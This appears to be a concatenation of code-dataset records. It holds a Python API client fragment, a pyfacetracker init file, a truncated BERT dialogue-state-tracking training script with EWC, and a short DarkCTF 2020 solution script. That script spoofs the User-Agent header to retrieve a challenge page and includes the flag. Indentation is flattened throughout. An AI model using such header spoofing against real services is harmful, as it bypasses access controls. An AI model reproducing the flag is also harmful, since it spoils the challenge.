if httpmode == 'GET':
url='http://'+self.host+':'+str(self.port)+'/'+command+'?'+uq+'&'+uopts
resp,cont=self.conn.request(url,method='GET',headers=self.headers)
elif httpmode == 'POST':
url='http://'+self.host+':'+str(self.port)+'/'+command
resp,cont=self.conn.request(url,method='POST',headers=self.headers,body='?'+uq+'&'+uopts)
else:
print "BAD HTTP MODE:",httpmode
return None
if self.verbose:
print "REQUEST URL =",url
if resp.status==200:
if not parse:
return cont
if not opts.has_key("format") or opts["format"] == "json":
j=json.loads(cont)
return j
elif opts.has_key("format"):
if opts["format"] == "yaml":
return yaml.safe_load(cont)
elif opts["format"] in ["xml","oldxml","johnxml"]:
return cont
else:
print resp,cont
return None
def search_iter(self,q,opts={},pagesize=10):
opts['format'] = 'json'
lq = copy.deepcopy(q)
lq['limit'] = pagesize
r = self.query('POST','entity/search',lq,opts)
hits = []
if r.get('response'):
hits.extend(r['response'])
find_dupes(hits)
while r.get('cursor'):
#print "ITER CURSOR:",r['cursor'][0:60]
#print "DECODED CURSOR:",json.dumps(parse_cursor(r['cursor']),indent=4,sort_keys=True)
lq = {"cursor":r['cursor'],"limit":pagesize}
r = self.query('POST','entity/search',lq,opts)
if r.get('response'):
hits.extend(r['response'])
print "TOTAL HITS:",len(hits)
find_dupes(hits)
return hits
def find_dupes(l):
h = set()
for hit in l:
i = hit['props']['urn:lri:property_type:guid']
if i in h:
print "DUPLICATE! ",i
h.add(i)
#print "TOTAL SET:",json.dumps(sorted(list(h)),indent=4)
if __name__=='__main__':
h,p = sys.argv[1].split(":")
c=client(host=h,port=int(p))
q = json.loads(sys.argv[2])
print "QUERY:\n",json.dumps(q,indent=4,sort_keys=True)
    if len(sys.argv) > 3:
        pagesize = int(sys.argv[3])
    else:
        pagesize = 10
response = c.search_iter(q,pagesize=pagesize)
print json.dumps(response,indent=4,sort_keys=True)
"""
Usage examples:\n
./client.py GET entity/search '{"urn:lri:property_type:types":"urn:lri:entity_type:type"}' '{"details":true}'
./client.py GET entity/create '{"urn:lri:property_type:id":"MY_FQGUID","urn:lri:property_type:types":["urn:lri:entity_type:thing"]}'
./client.py GET property/create '{"from":"MY_ENTITY_GUID","urn:lri:property_type:name":"THE NAME OF MY ENTITY"}'
./client.py GET property/update '{"guid":"MY_PROPERTY_GUID","value":"MY NEW NAME"}'
"""
| 2.5 | 2 |
DarkCTF 2020/Web/Source/exploit.py | UnknownAbyss/CTF-Write-ups | 73 | 12796176 | import requests
url = 'http://source.darkarmy.xyz/'
r = requests.get(url, headers={
'user-agent': '9e9',
})
print(r.text)
# darkCTF{changeing_http_user_agent_is_easy} | 2.421875 | 2 |
facetracker/__init__.py | amitibo/pyfacetracker | 2 | 12796177 | """
pyfacetracker: Python wrapper for FaceTracker.
==============================================
FaceTracker is a library for deformable face tracking written in C++ using
OpenCV 2, authored by <NAME> and maintained by <NAME>. It is
available free for non-commercial use, and may be redistributed under these
conditions. Please see the LICENSE file for complete details.
**pyfacetracker** is a thin wrapper around FaceTracker. It enables using
FaceTracker while enjoyging the comfort of the Python scripting language.
pyfacetracker is available under the BSD License. This has no effect on
Jason's code, which is available under a separate license.
pyfacetracker is copyright (C) 2012 by <NAME>
.. codeauthor:: <NAME> <<EMAIL>>
"""
from _facetracker import * | 1.445313 | 1 |
code/main-multislot-ewc.py | gungui98/sumbt | 99 | 12796178 | import csv
import os
import logging
import argparse
import random
import collections
import operator
from tqdm import tqdm, trange
import numpy as np
import torch
from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler
from torch.utils.data.distributed import DistributedSampler
from pytorch_pretrained_bert.tokenization import BertTokenizer
from pytorch_pretrained_bert.optimization import BertAdam
from tensorboardX import SummaryWriter
import pdb
import matplotlib.pyplot as plt
import seaborn
seaborn.set_context(context="talk")
logging.basicConfig(format='%(asctime)s - %(levelname)s - %(name)s - %(message)s',
datefmt='%m/%d/%Y %H:%M:%S',
level=logging.INFO)
logger = logging.getLogger(__name__)
###############################################################################
# Data Preprocessing
###############################################################################
class InputExample(object):
"""A single training/test example for simple sequence classification."""
def __init__(self, guid, text_a, text_b=None, label=None, prev_label=None):
self.guid = guid
self.text_a = text_a
self.text_b = text_b
self.label = label # Target slots in this training task
self.prev_label = prev_label # trained slots in previous tasks
class InputFeatures(object):
"""A single set of features of data."""
def __init__(self, input_ids, input_len, label_id, prev_label_id):
self.input_ids = input_ids
self.input_len = input_len
self.label_id = label_id
self.prev_label_id = prev_label_id # trained slots in previous tasks
class DataProcessor(object):
"""Base class for data converters for sequence classification data sets."""
def get_train_examples(self, data_dir):
"""Gets a collection of `InputExample`s for the train set."""
raise NotImplementedError()
def get_dev_examples(self, data_dir):
"""Gets a collection of `InputExample`s for the dev set."""
raise NotImplementedError()
def get_labels(self):
"""Gets the list of labels for this data set."""
raise NotImplementedError()
@classmethod
def _read_tsv(cls, input_file, quotechar=None):
"""Reads a tab separated value file."""
with open(input_file, "r", encoding='utf-8') as f:
reader = csv.reader(f, delimiter="\t", quotechar=quotechar)
lines = []
for line in reader:
if len(line) > 0 and line[0][0] == '#': # ignore comments (starting with '#')
continue
lines.append(line)
return lines
class Processor(DataProcessor):
"""Processor for the belief tracking dataset (GLUE version)."""
def __init__(self, config):
super(Processor, self).__init__()
import json
if config.data_dir == "data/woz" or config.data_dir=="data/woz-turn":
fp_ontology = open(os.path.join(config.data_dir, "ontology_dstc2_en.json"), "r")
ontology = json.load(fp_ontology)
ontology = ontology["informable"]
del ontology["request"]
for slot in ontology.keys():
ontology[slot].append("do not care")
ontology[slot].append("none")
fp_ontology.close()
elif config.data_dir == "data/multiwoz":
fp_ontology = open(os.path.join(config.data_dir, "ontology.json"), "r")
ontology = json.load(fp_ontology)
for slot in ontology.keys():
ontology[slot].append("none")
fp_ontology.close()
if not config.target_slot == 'all':
slot_idx = {'attraction':'0:1:2', 'bus':'3:4:5:6', 'hospital':'7', 'hotel':'8:9:10:11:12:13:14:15:16:17',\
'restaurant':'18:19:20:21:22:23:24', 'taxi':'25:26:27:28', 'train':'29:30:31:32:33:34'}
target_slot =[]
prev_slot = []
for key, value in slot_idx.items():
if key == config.target_slot:
target_slot.append(value)
else:
prev_slot.append(value)
config.target_slot = ':'.join(target_slot)
config.prev_slot = ':'.join(prev_slot)
else:
raise NotImplementedError()
# sorting the ontology according to the alphabetic order of the slots
self.ontology = collections.OrderedDict(sorted(ontology.items()))
# select slots to train
self.target_slot = []
self.prev_slot = []
self.target_slot_idx = sorted([ int(x) for x in config.target_slot.split(':')])
self.prev_slot_idx = sorted([ int(x) for x in config.prev_slot.split(':')])
ontology_items = list(self.ontology.items())
for idx, domain in enumerate(ontology_items):
slot, value = domain
if slot == "pricerange":
slot = "price range"
if idx in self.target_slot_idx:
self.target_slot.append(slot)
elif idx in self.prev_slot_idx:
self.prev_slot.append(slot)
self.all_slot = self.prev_slot + self.target_slot
logger.info('Processor: previous slots: ' + ', '.join(self.prev_slot))
logger.info('Processor: target slots: '+ ', '.join(self.target_slot))
def get_train_examples(self, data_dir, accumulation=False):
"""See base class."""
return self._create_examples(
self._read_tsv(os.path.join(data_dir, "train.tsv")), "train", accumulation)
def get_dev_examples(self, data_dir, accumulation=False):
"""See base class."""
return self._create_examples(
self._read_tsv(os.path.join(data_dir, "dev.tsv")), "dev", accumulation)
def get_test_examples(self, data_dir, accumulation=False):
"""See base class."""
return self._create_examples(
self._read_tsv(os.path.join(data_dir, "test.tsv")), "test", accumulation)
def get_labels(self):
"""See base class."""
return [ self.ontology[slot] for slot in self.target_slot]
def get_prev_labels(self):
"""See base class."""
return [ self.ontology[slot] for slot in self.prev_slot]
def _create_examples(self, lines, set_type, accumulation=False):
"""Creates examples for the training and dev sets."""
prev_dialogue_index = None
examples = []
for (i, line) in enumerate(lines):
guid = "%s-%s-%s" % (set_type, line[0], line[1]) # line[0]: dialogue index, line[1]: turn index
if accumulation:
if prev_dialogue_index is None or prev_dialogue_index != line[0]:
text_a = line[2]
text_b = line[3]
prev_dialogue_index = line[0]
else:
# The symbol '#' will be replaced with '[SEP]' after tokenization.
text_a = line[2] + " # " + text_a
text_b = line[3] + " # " + text_b
else:
text_a = line[2] # line[2]: user utterance
text_b = line[3] # line[3]: system response
label = [ line[4+idx] for idx in self.target_slot_idx]
prev_label = [ line[4+idx] for idx in self.prev_slot_idx]
examples.append(
InputExample(guid=guid, text_a=text_a, text_b=text_b, label=label, prev_label=prev_label))
return examples
def convert_examples_to_features(examples, label_list, prev_label_list, max_seq_length, tokenizer, max_turn_length):
"""Loads a data file into a list of `InputBatch`s."""
slot_dim = len(label_list)
prev_slot_dim = len(prev_label_list)
def _hard_coding_label(label):
return 'do not care' if label=='dontcare' else label
def _get_label(label, label_list):
label_id = []
label_info = ''
label_map = [{_label: i for i, _label in enumerate(labels)} for labels in label_list]
for i, label in enumerate(label):
label = _hard_coding_label(label)
label_id.append(label_map[i][label])
label_info += '%s (id = %d) ' % (label, label_map[i][label])
return label_id, label_info
features = []
prev_dialogue_idx = None
all_padding = [0] * max_seq_length
all_padding_len = [0, 0]
max_turn = 0
for (ex_index, example) in enumerate(examples):
if max_turn < int(example.guid.split('-')[2]):
max_turn = int(example.guid.split('-')[2])
max_turn_length = min(max_turn+1, max_turn_length)
logger.info("max_turn_length = %d" % max_turn)
for (ex_index, example) in enumerate(examples):
tokens_a = [x if x != '#' else '[SEP]' for x in tokenizer.tokenize(example.text_a)]
tokens_b = None
if example.text_b:
tokens_b = [x if x != '#' else '[SEP]' for x in tokenizer.tokenize(example.text_b)]
_truncate_seq_pair(tokens_a, tokens_b, max_seq_length - 3)
else:
# Account for [CLS] and [SEP] with "- 2"
if len(tokens_a) > max_seq_length - 2:
tokens_a = tokens_a[:(max_seq_length - 2)]
tokens = ["[CLS]"] + tokens_a + ["[SEP]"]
input_len = [len(tokens), 0]
if tokens_b:
tokens += tokens_b + ["[SEP]"]
input_len[1] = len(tokens_b) + 1
input_ids = tokenizer.convert_tokens_to_ids(tokens)
# Zero-pad up to the sequence length.
input_ids += [0] * (max_seq_length - len(input_ids)) # Note: padding idx = 0
assert len(input_ids) == max_seq_length
label_id, label_info = _get_label(example.label, label_list)
prev_label_id, prev_label_info = _get_label(example.prev_label, prev_label_list)
if ex_index < 5:
logger.info("*** Example ***")
logger.info("guid: %s" % example.guid)
logger.info("tokens: %s" % " ".join([str(x) for x in tokens]))
logger.info("input_ids: %s" % " ".join([str(x) for x in input_ids]))
logger.info("input_len: %s" % " ".join([str(x) for x in input_len]))
logger.info("label: " + label_info)
logger.info("previous label: " + prev_label_info)
curr_dialogue_idx = example.guid.split('-')[1]
curr_turn_idx = int(example.guid.split('-')[2])
if (prev_dialogue_idx is not None) and (prev_dialogue_idx != curr_dialogue_idx):
if prev_turn_idx < max_turn_length:
features += [InputFeatures(input_ids=all_padding,
input_len=all_padding_len,
label_id=[-1]*slot_dim,
prev_label_id=[-1] * prev_slot_dim)] * (max_turn_length - prev_turn_idx - 1)
assert len(features) % max_turn_length == 0
if prev_dialogue_idx is None or prev_turn_idx < max_turn_length:
features.append(InputFeatures(input_ids=input_ids,
input_len=input_len,
label_id=label_id,
prev_label_id=prev_label_id,
))
prev_dialogue_idx = curr_dialogue_idx
prev_turn_idx = curr_turn_idx
if prev_turn_idx < max_turn_length:
features += [InputFeatures(input_ids=all_padding,
input_len=all_padding_len,
label_id=[-1]*slot_dim,
prev_label_id=[-1]*prev_slot_dim)] * (max_turn_length - prev_turn_idx - 1)
assert len(features) % max_turn_length == 0
all_input_ids = torch.tensor([f.input_ids for f in features], dtype=torch.long)
all_input_len= torch.tensor([f.input_len for f in features], dtype=torch.long)
all_label_ids = torch.tensor([f.label_id for f in features], dtype=torch.long)
all_prev_label_ids = torch.tensor([f.prev_label_id for f in features], dtype=torch.long)
# reshape tensors to [batch, turn, word]
all_input_ids = all_input_ids.view(-1, max_turn_length, max_seq_length)
all_input_len = all_input_len.view(-1, max_turn_length, 2)
all_label_ids = all_label_ids.view(-1, max_turn_length, slot_dim)
all_prev_label_ids = all_prev_label_ids.view(-1, max_turn_length, prev_slot_dim)
return all_input_ids, all_input_len, all_label_ids, all_prev_label_ids
def get_label_embedding(labels, max_seq_length, tokenizer, device):
features = []
for label in labels:
label_tokens = ["[CLS]"] + tokenizer.tokenize(label) + ["[SEP]"]
label_token_ids = tokenizer.convert_tokens_to_ids(label_tokens)
label_len = len(label_token_ids)
label_padding = [0] * (max_seq_length - len(label_token_ids))
label_token_ids += label_padding
assert len(label_token_ids) == max_seq_length
features.append((label_token_ids, label_len))
all_label_token_ids = torch.tensor([f[0] for f in features], dtype=torch.long).to(device)
all_label_len = torch.tensor([f[1] for f in features], dtype=torch.long).to(device)
return all_label_token_ids, all_label_len
def _truncate_seq_pair(tokens_a, tokens_b, max_length):
"""Truncates a sequence pair in place to the maximum length."""
while True:
total_length = len(tokens_a) + len(tokens_b)
if total_length <= max_length:
break
if len(tokens_a) > len(tokens_b):
tokens_a.pop()
else:
tokens_b.pop()
###############################################################################
# Miscellaneous functions
###############################################################################
def accuracy(out, labels):
outputs = np.argmax(out, axis=1)
return np.sum(outputs == labels)
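# Learning-rate multiplier: ramps up linearly over the first `warmup` fraction
# of training (x / warmup), then decays linearly as 1.0 - x for the remainder.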
def warmup_linear(x, warmup=0.002):
if x < warmup:
return x / warmup
return 1.0 - x
###############################################################################
# Main
###############################################################################
def main():
parser = argparse.ArgumentParser()
## Required parameters
parser.add_argument('--data_dir', type=str, required=True,
help='location of the data corpus')
parser.add_argument("--bert_model", default=None, type=str, required=True,
help="Bert pre-trained model selected in the list: bert-base-uncased, "
"bert-large-uncased, bert-base-cased, bert-large-cased, bert-base-multilingual-uncased, "
"bert-base-multilingual-cased, bert-base-chinese.")
parser.add_argument("--bert_dir", default='/gfs/nlp/.pytorch_pretrained_bert',
type=str, required=False,
help="The directory of the pretrained BERT model")
parser.add_argument("--task_name", default=None, type=str, required=True,
help="The name of the task to train: bert, bert-gru, bert-lstm, "
"bert-label-embedding, bert-gru-label-embedding, bert-lstm-label-embedding")
parser.add_argument("--output_dir", default=None, type=str, required=True,
help="The output directory where the model predictions and checkpoints will be written.")
parser.add_argument('--load_path', type=str, default='',
help='pretrained model directory name')
parser.add_argument("--target_slot", default='', type=str, required=True,
help="Target slot idx to train model. ex. '0:1:2 or an excluding slot name 'attraction'" )
parser.add_argument("--prev_slot", default='', type=str, required=True,
help="Previous trained slots. ex. '0:1:2 or an excluding slot name 'attraction'" )
parser.add_argument("--tf_dir", default='tensorboard', type=str, required=False,
help="Tensorboard directory")
parser.add_argument("--nbt", default='rnn', type=str, required=True,
help="nbt type: rnn or transformer or turn" )
parser.add_argument("--fix_utterance_encoder",
action='store_true',
help="Do not train BERT utterance encoder")
## Other parameters
parser.add_argument("--max_seq_length", default=64, type=int,
help="The maximum total input sequence length after WordPiece tokenization. \n"
"Sequences longer than this will be truncated, and sequences shorter \n"
"than this will be padded.")
parser.add_argument("--max_label_length", default=32, type=int,
help="The maximum total input sequence length after WordPiece tokenization. \n"
"Sequences longer than this will be truncated, and sequences shorter \n"
"than this will be padded.")
parser.add_argument("--max_turn_length", default=22, type=int,
help="The maximum total input turn length. \n"
"Sequences longer than this will be truncated, and sequences shorter \n"
"than this will be padded.")
parser.add_argument('--hidden_dim',
type=int,
default=100,
help="hidden dimension used in belief tracker")
parser.add_argument('--num_rnn_layers',
type=int,
default=1,
help="number of RNN layers")
parser.add_argument('--zero_init_rnn',
action='store_true',
help="set initial hidden of rnns zero")
parser.add_argument('--skip_connect',
type=str,
default=False,
help="skip-connection")
parser.add_argument('--attn_head',
type=int,
default=4,
help="the number of heads in multi-headed attention")
parser.add_argument("--do_train",
action='store_true',
help="Whether to run training.")
parser.add_argument("--do_eval",
action='store_true',
help="Whether to run eval on the test set.")
parser.add_argument("--do_analyze",
action='store_true',
help="Whether to run analysis on the test set.")
parser.add_argument("--do_lower_case",
action='store_true',
help="Set this flag if you are using an uncased model.")
parser.add_argument("--set_label_encoder_trainable",
action='store_true',
help="Set this flag if you want to set the label encoder trainable. \n"
"This option is valid only when using label embeddings. \n")
parser.add_argument("--distance_metric",
type=str,
default="cosine",
help="The metric for distance between label embeddings: cosine, euclidean.")
parser.add_argument("--train_batch_size",
default=4,
type=int,
help="Total batch size for training.")
parser.add_argument("--dev_batch_size",
default=1,
type=int,
help="Total batch size for validation.")
parser.add_argument("--eval_batch_size",
default=16,
type=int,
help="Total batch size for eval.")
parser.add_argument("--learning_rate",
default=5e-5,
type=float,
help="The initial learning rate for Adam.")
parser.add_argument("--num_train_epochs",
default=3.0,
type=float,
help="Total number of training epochs to perform.")
parser.add_argument("--patience",
default=10.0,
type=float,
help="The number of epochs to allow no further improvement.")
parser.add_argument("--warmup_proportion",
default=0.1,
type=float,
help="Proportion of training to perform linear learning rate warmup for. "
"E.g., 0.1 = 10%% of training.")
parser.add_argument("--lambda_ewc",
default=0.1,
type=float,
help="Hyper-parameter for EWC")
parser.add_argument("--no_cuda",
action='store_true',
help="Whether not to use CUDA when available")
parser.add_argument("--local_rank",
type=int,
default=-1,
help="local_rank for distributed training on gpus")
parser.add_argument('--seed',
type=int,
default=42,
help="random seed for initialization")
parser.add_argument('--gradient_accumulation_steps',
type=int,
default=1,
help="Number of updates steps to accumulate before performing a backward/update pass.")
parser.add_argument('--fp16',
action='store_true',
help="Whether to use 16-bit float precision instead of 32-bit")
parser.add_argument('--loss_scale',
type=float, default=0,
help="Loss scaling to improve fp16 numeric stability. Only used when fp16 set to True.\n"
"0 (default value): dynamic loss scaling.\n"
"Positive power of 2: static loss scaling value.\n")
parser.add_argument("--do_not_use_tensorboard",
action='store_true',
help="Whether to run eval on the test set.")
args = parser.parse_args()
if os.path.exists(args.output_dir) and os.listdir(args.output_dir) and args.do_train:
raise ValueError("Output directory ({}) already exists and is not empty.".format(args.output_dir))
os.makedirs(args.output_dir, exist_ok=True)
task_name = args.task_name.lower()
tb_file_name = args.output_dir.split('/')[1]
# Tensorboard logging
if not args.do_not_use_tensorboard:
summary_writer = SummaryWriter("./%s/%s" % (args.tf_dir, tb_file_name))
else:
summary_writer = None
fileHandler = logging.FileHandler(os.path.join(args.output_dir, "%s.txt"%(tb_file_name)))
logger.addHandler(fileHandler)
logger.info(args)
# CUDA setting
if args.local_rank == -1 or args.no_cuda:
device = torch.device("cuda" if torch.cuda.is_available() and not args.no_cuda else "cpu")
n_gpu = torch.cuda.device_count()
else:
torch.cuda.set_device(args.local_rank)
device = torch.device("cuda", args.local_rank)
n_gpu = 1
# Initializes the distributed backend which will take care of sychronizing nodes/GPUs
torch.distributed.init_process_group(backend='nccl')
logger.info("device: {} n_gpu: {}, distributed training: {}, 16-bits training: {}".format(
device, n_gpu, bool(args.local_rank != -1), args.fp16))
if args.gradient_accumulation_steps < 1:
raise ValueError("Invalid gradient_accumulation_steps parameter: {}, should be >= 1".format(
args.gradient_accumulation_steps))
args.train_batch_size = int(args.train_batch_size / args.gradient_accumulation_steps)
# Set the random seed manually for reproducibility.
random.seed(args.seed)
np.random.seed(args.seed)
torch.manual_seed(args.seed)
if n_gpu > 0:
torch.cuda.manual_seed_all(args.seed)
if not args.do_train and not args.do_eval and not args.do_analyze:
raise ValueError("At least one of `do_train` or `do_eval` must be True.")
###############################################################################
# Load data
###############################################################################
# Get Processor
processor = Processor(args)
prev_label_list = processor.get_prev_labels() # Slot value labels of Previous task
target_label_list = processor.get_labels() # Slot value labels of Present task
label_list = prev_label_list + target_label_list # All slot value labels
num_labels = [len(labels) for labels in label_list] # Number of labels of all slots
#prev_slot_id = processor.prev_slot_idx
#target_slot_id = processor.target_slot_idx
# wrong
prev_slot_id = list(range(0, len(processor.prev_slot))) # List of slots in previous task
target_slot_id = list(range(len(processor.prev_slot), len(processor.all_slot))) # list of slots in present task
# tokenizer
vocab_dir = os.path.join(args.bert_dir, '%s-vocab.txt' % args.bert_model)
if not os.path.exists(vocab_dir):
raise ValueError("Can't find %s " % vocab_dir)
tokenizer = BertTokenizer.from_pretrained(vocab_dir, do_lower_case=args.do_lower_case)
num_train_steps = None
accumulation = False
if args.do_train:
train_examples = processor.get_train_examples(args.data_dir, accumulation=accumulation)
dev_examples = processor.get_dev_examples(args.data_dir, accumulation=accumulation)
num_train_steps = int(len(train_examples) / args.train_batch_size * args.num_train_epochs)
num_dev_steps = int(len(dev_examples) / args.dev_batch_size * args.num_train_epochs)
## utterances
all_input_ids, all_input_len, all_label_ids, all_prev_label_ids = convert_examples_to_features(
train_examples, target_label_list, prev_label_list, args.max_seq_length, tokenizer, args.max_turn_length)
logger.info("***** Running training *****")
logger.info(" Num examples = %d", len(train_examples))
logger.info(" Batch size = %d", args.train_batch_size)
logger.info(" Num steps = %d", num_train_steps)
all_input_ids, all_input_len, all_label_ids, all_prev_label_ids \
= all_input_ids.to(device), all_input_len.to(device), all_label_ids.to(device), all_prev_label_ids.to(device)
train_data = TensorDataset(all_input_ids, all_input_len, all_label_ids, all_prev_label_ids)
if args.local_rank == -1:
train_sampler = RandomSampler(train_data)
else:
train_sampler = DistributedSampler(train_data)
train_dataloader = DataLoader(train_data, sampler=train_sampler, batch_size=args.train_batch_size)
## Dev
## utterances
all_input_ids_dev, all_input_len_dev, all_label_ids_dev, all_prev_label_ids_dev = convert_examples_to_features(
dev_examples, target_label_list, prev_label_list, args.max_seq_length, tokenizer, args.max_turn_length)
logger.info("***** Running validation *****")
logger.info(" Num examples = %d", len(dev_examples))
logger.info(" Batch size = %d", args.dev_batch_size)
logger.info(" Num steps = %d", num_dev_steps)
all_input_ids_dev, all_input_len_dev, all_label_ids_dev, all_prev_label_ids_dev = \
all_input_ids_dev.to(device), all_input_len_dev.to(device), all_label_ids_dev.to(device), all_prev_label_ids_dev.to(device)
dev_data = TensorDataset(all_input_ids_dev, all_input_len_dev, all_label_ids_dev, all_prev_label_ids_dev)
dev_sampler = SequentialSampler(dev_data)
dev_dataloader = DataLoader(dev_data, sampler=dev_sampler, batch_size=args.dev_batch_size)
logger.info("Loaded data!")
###############################################################################
# Build the models
###############################################################################
# Prepare model
if args.nbt =='rnn':
from BeliefTrackerSlotQueryMultiSlot import BeliefTracker
if args.task_name.find("gru") == -1 and args.task_name.find("lstm") == -1:
raise ValueError("Task name should include at least \"gru\" or \"lstm\"")
elif args.nbt =='turn':
from BeliefTrackerSlotQueryMultiSlotTurn import BeliefTracker
elif args.nbt == 'transformer':
from BeliefTrackerSlotQueryMultiSlotTransformer import BeliefTracker
from BeliefTrackerSlotQueryMultiSlotEWC import EWC
else:
raise ValueError('nbt type should be either rnn or transformer')
from BeliefTrackerSlotQueryMultiSlotEWC import EWC
model = BeliefTracker(args, num_labels, device)
if args.fp16:
model.half()
# Load pretrained model
# in the case that slot and values are different between the training and evaluation
ptr_model = torch.load(args.load_path, map_location=device)
del_list = []
rename_list = []
for key in ptr_model.keys():
if ('slot_lookup' in key) or ('value_lookup' in key): # remove slot_lookup and value_lookup
del_list.append(key)
if ('rnn.' in key): # rename rnn -> nbt,
rename_list.append(key)
for key in del_list:
del ptr_model[key]
for key in rename_list:
new_key = key.replace('rnn.', 'nbt.')
ptr_model[new_key] = ptr_model[key]
del ptr_model[key]
state = model.state_dict()
state.update(ptr_model)
model.load_state_dict(state)
model.to(device)
## Get slot-value embeddings
label_token_ids, label_len = [], []
for labels in label_list:
token_ids, lens = get_label_embedding(labels, args.max_label_length, tokenizer, device)
label_token_ids.append(token_ids)
label_len.append(lens)
## Get slot-type embeddings
## Note: slot embeddings are ordered as [previous slots + present target slots]
slot_token_ids, slot_len = \
get_label_embedding(processor.all_slot, args.max_label_length, tokenizer, device)
model.initialize_slot_value_lookup(label_token_ids, label_len, slot_token_ids, slot_len)
if args.local_rank != -1:
try:
from apex.parallel import DistributedDataParallel as DDP
except ImportError:
raise ImportError(
"Please install apex from https://www.github.com/nvidia/apex to use distributed and fp16 training.")
model = DDP(model)
elif n_gpu > 1:
model = torch.nn.DataParallel(model)
# Prepare optimizer
if args.do_train:
def get_optimizer_grouped_parameters(model):
param_optimizer = [(n, p) for n, p in model.named_parameters() if p.requires_grad]
no_decay = ['bias', 'LayerNorm.bias', 'LayerNorm.weight']
optimizer_grouped_parameters = [
{'params': [p for n, p in param_optimizer if not any(nd in n for nd in no_decay)], 'weight_decay': 0.01,
'lr': args.learning_rate},
{'params': [p for n, p in param_optimizer if any(nd in n for nd in no_decay)], 'weight_decay': 0.0,
'lr': args.learning_rate},
]
return optimizer_grouped_parameters
if n_gpu == 1:
optimizer_grouped_parameters = get_optimizer_grouped_parameters(model)
else:
optimizer_grouped_parameters = get_optimizer_grouped_parameters(model.module)
t_total = num_train_steps
if args.local_rank != -1:
t_total = t_total // torch.distributed.get_world_size()
if args.fp16:
try:
from apex.optimizers import FP16_Optimizer
from apex.optimizers import FusedAdam
except ImportError:
raise ImportError(
"Please install apex from https://www.github.com/nvidia/apex to use distributed and fp16 training.")
optimizer = FusedAdam(optimizer_grouped_parameters,
lr=args.learning_rate,
bias_correction=False,
max_grad_norm=1.0)
if args.loss_scale == 0:
optimizer = FP16_Optimizer(optimizer, dynamic_loss_scale=True)
else:
optimizer = FP16_Optimizer(optimizer, static_loss_scale=args.loss_scale)
else:
optimizer = BertAdam(optimizer_grouped_parameters,
lr=args.learning_rate,
warmup=args.warmup_proportion,
t_total=t_total)
logger.info(optimizer)
###############################################################################
# Training code
###############################################################################
if args.do_train:
logger.info("Training...")
global_step = 0
last_update = None
best_loss = None
#### EWC: calculate Fisher
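        # Elastic Weight Consolidation (Kirkpatrick et al., 2017), as assumed from the
        # external EWC helper: a diagonal Fisher information is estimated on the dev data
        # for the previously trained slots, and ewc.penalty(model) later adds the term
        #     lambda_ewc * sum_i F_i * (theta_i - theta_i_old)^2
        # to the loss so parameters important for the old slots resist drifting.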
ewc = EWC(model, dev_dataloader, oldtask=prev_slot_id, num_labels=num_labels, device=device, n_gpu=n_gpu)
for epoch in trange(int(args.num_train_epochs), desc="Epoch"):
# for epoch in trange(1):
#### TRAIN
model.train()
tr_loss = 0
nb_tr_examples, nb_tr_steps = 0, 0
for step, batch in enumerate(tqdm(train_dataloader, desc="Iteration")):
batch = tuple(t.to(device) for t in batch)
input_ids, input_len, label_ids, _ = batch
if n_gpu == 1:
loss_, loss_slot, acc, acc_slot, _ = model(input_ids, input_len, label_ids, n_gpu, target_slot=target_slot_id)
loss_ewc = ewc.penalty(model)
loss = loss_ + args.lambda_ewc * loss_ewc
else:
loss_, _, acc, acc_slot, _ = model(input_ids, input_len, label_ids, n_gpu,
target_slot=target_slot_id)
loss_ = loss_.mean()
acc = acc.mean()
acc_slot = acc_slot.mean(0)
loss_ewc = ewc.penalty(model)
loss = loss_ + args.lambda_ewc * loss_ewc
if args.gradient_accumulation_steps > 1:
loss = loss / args.gradient_accumulation_steps
if args.fp16:
optimizer.backward(loss)
else:
loss.backward()
if summary_writer is not None:
summary_writer.add_scalar("Epoch", epoch, global_step)
summary_writer.add_scalar("Train/Loss", loss_, global_step)
summary_writer.add_scalar("Train/Loss_EWC", loss_ewc, global_step)
summary_writer.add_scalar("Train/Loss_Total", loss, global_step)
summary_writer.add_scalar("Train/JointAcc", acc, global_step)
if n_gpu == 1:
for i, slot in enumerate(processor.target_slot):
summary_writer.add_scalar("Train/Loss_%s" % slot.replace(' ','_'), loss_slot[i], global_step)
summary_writer.add_scalar("Train/Acc_%s" % slot.replace(' ','_'), acc_slot[i], global_step)
tr_loss += loss.item()
nb_tr_examples += input_ids.size(0)
nb_tr_steps += 1
if (step + 1) % args.gradient_accumulation_steps == 0:
# modify learning rate with special warm up BERT uses
lr_this_step = args.learning_rate * warmup_linear(global_step / t_total, args.warmup_proportion)
if summary_writer is not None:
summary_writer.add_scalar("Train/LearningRate", lr_this_step, global_step)
for param_group in optimizer.param_groups:
param_group['lr'] = lr_this_step
optimizer.step()
optimizer.zero_grad()
global_step += 1
# Perform evaluation on validation dataset
model.eval()
dev_loss = 0
dev_acc = 0
dev_loss_slot, dev_acc_slot = None, None
nb_dev_examples, nb_dev_steps = 0, 0
prev_dev_loss = 0
prev_dev_acc = 0
prev_dev_loss_slot, prev_dev_acc_slot = None, None
prev_nb_dev_examples = 0
for step, batch in enumerate(tqdm(dev_dataloader, desc="Validation")):
batch = tuple(t.to(device) for t in batch)
input_ids, input_len, label_ids, prev_label_ids = batch
if input_ids.dim() == 2:
input_ids = input_ids.unsqueeze(0)
input_len = input_len.unsqueeze(0)
                    label_ids = label_ids.unsqueeze(0)
                    prev_label_ids = prev_label_ids.unsqueeze(0)
with torch.no_grad():
if n_gpu == 1:
loss_, loss_slot, acc, acc_slot, _ = model(input_ids, input_len, label_ids, n_gpu,
target_slot=target_slot_id)
loss = loss_ + args.lambda_ewc * ewc.penalty(model)
prev_loss, prev_loss_slot, prev_acc, prev_acc_slot, _ = model(input_ids, input_len,
prev_label_ids, n_gpu,
target_slot=prev_slot_id)
else:
loss_, _, acc, acc_slot, _ = model(input_ids, input_len, label_ids, n_gpu, target_slot=target_slot_id)
loss_ = loss_.mean()
acc = acc.mean()
acc_slot = acc_slot.mean(0)
loss_ewc = ewc.penalty(model)
loss = loss_ + args.lambda_ewc * loss_ewc
prev_loss, _, prev_acc, prev_acc_slot, _ = model(input_ids, input_len, prev_label_ids, n_gpu, target_slot=prev_slot_id)
prev_loss = prev_loss.mean()
prev_acc = prev_acc.mean()
prev_acc_slot = prev_acc_slot.mean(0)
num_valid_turn = torch.sum(label_ids[:,:,0].view(-1) > -1, 0).item()
dev_loss += loss.item() * num_valid_turn
dev_acc += acc.item() * num_valid_turn
prev_num_valid_turn = torch.sum(prev_label_ids[:,:,0].view(-1) > -1, 0).item()
prev_dev_loss += prev_loss.item() * prev_num_valid_turn
